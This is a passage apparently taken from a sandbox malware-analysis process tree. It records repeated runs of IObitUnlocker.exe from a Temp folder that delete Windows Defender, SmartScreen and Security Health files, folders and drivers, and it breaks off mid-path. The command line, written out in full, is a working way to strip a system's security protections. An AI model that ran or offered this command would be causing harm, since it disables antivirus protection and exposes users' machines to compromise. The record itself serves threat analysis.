                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 